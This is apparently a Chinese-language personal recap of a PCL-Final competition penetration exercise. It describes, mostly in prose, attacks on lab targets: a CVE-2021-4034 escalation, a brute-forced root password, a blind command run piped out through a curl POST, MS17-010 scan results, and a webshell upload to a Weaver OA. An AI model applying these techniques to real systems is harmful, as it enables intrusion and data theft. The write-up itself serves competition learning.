PCL-Final复盘
2023-11-21 23:00:00

部分关键步骤忘记截图了。。。

# Day1 水务安全

是个 OA,上来直接嗦,第一个 flag 没截图

翻配置文件,php 文件做了混淆,看备份文件 bak

2

连上数据库拿到 flag

1

然后一把嗦内网,挂代理

内网一个 weblogic

里面有两个 flag

这是其中一个可以直接读取的

3

还有一个在根目录的 flag.txt

看下 history 提到了 CVE-2021-4034

用准备好的样本直接命令执行,但是读取有点问题,就通过执行 > cat flag.txt 直接把 flag 重定向成文件名

4

# Day2 金融安全第三问

非预期

爆破出来服务器 root/123456

flag 在 /srv/flag

没截图。。。

机器拿到的时候是不回显的,就在本地写了一个

file_put_content,把执行的 POST [1] 参数内容放入到 1.txt

然后再机器上执行 curl -d docker exec -it 53af5882ce3f cat /srv/flag > 1.txt

# Day3 政务安全

给了几个站点,没有截图也不记得叫什么了。。。

截取的扫描结果

1
2
3
4
5
6
7
8
[+] 10.10.2.11  MS17-010        (Windows 7 Ultimate 7601 Service Pack 1)
[*] WebTitle: http://10.10.4.2:9010 code:307 len:57 title:None 跳转url: http://10.10.4.2:9001
[*] WebTitle: http://10.10.2.2:8080 code:403 len:555 title:403 Forbidden
[*] WebTitle: http://10.10.2.3:8080 code:403 len:548 title:403 Forbidden
[*] WebTitle: http://10.10.4.3:8080 code:200 len:11197 title:Apache Tomcat/7.0.76
[*] WebTitle: http://10.10.4.2:9080 code:200 len:23167 title:Portainer
[+] 10.10.4.6 MS17-010 (Windows 7 Ultimate 7601 Service Pack 1)
[+] 10.10.1.17 MS17-010 (Windows 7 Ultimate 7601 Service Pack 1)

直接打

tmd

tmd2

然后准备进一步扩大成果的时候,剩余两台机器和这台机器直接全没了,不清楚是哪位大哥还是主办方环境有问题。。。。

# Day3 企业对抗

泛微 OA 未授权

image-20231122004702085

任意文件上传

这里马子连上就掉,后面干脆连不上,还会一直删除,然后五个环境要么没有 www 权限,要么路由删了,要么直接崩了。。。。

image-20231122004746901

image-20231122004802343

任意文件读取

image-20231122004936764

总结:

第二天的那个 supershell,默认秘钥没进去很亏,少刷一个内网

然后是一些 payload 准备的不充分,kali 环境桥接模式下,静态 IP 的文件忘记了位置,导致前面不能方便的上工具

内网一些知识还是比较模糊的,比赛时手忙脚乱。心态也不稳定,如果渗透的出现偏差就会打的畏手畏脚

渗透相对打的确实很少,回去后要多加强红队的技能和知识体系。